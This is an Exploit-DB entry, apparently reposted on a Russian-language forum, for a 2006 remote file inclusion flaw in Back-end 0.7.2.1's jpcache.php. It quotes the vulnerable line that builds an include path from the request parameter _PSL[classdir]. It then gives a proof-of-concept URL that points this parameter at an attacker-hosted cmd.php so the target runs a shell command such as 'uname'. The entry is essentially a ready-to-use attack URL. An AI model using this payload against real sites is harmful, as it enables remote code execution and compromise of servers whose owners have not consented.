- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1888
- Проверка EDB
-
- Пройдено
- Автор
- FEDERICO FAZZI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2006-06-08
Код:
# Federico Fazzi, <[email protected]>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname
# milw0rm.com [2006-06-08]- Источник
- www.exploit-db.com
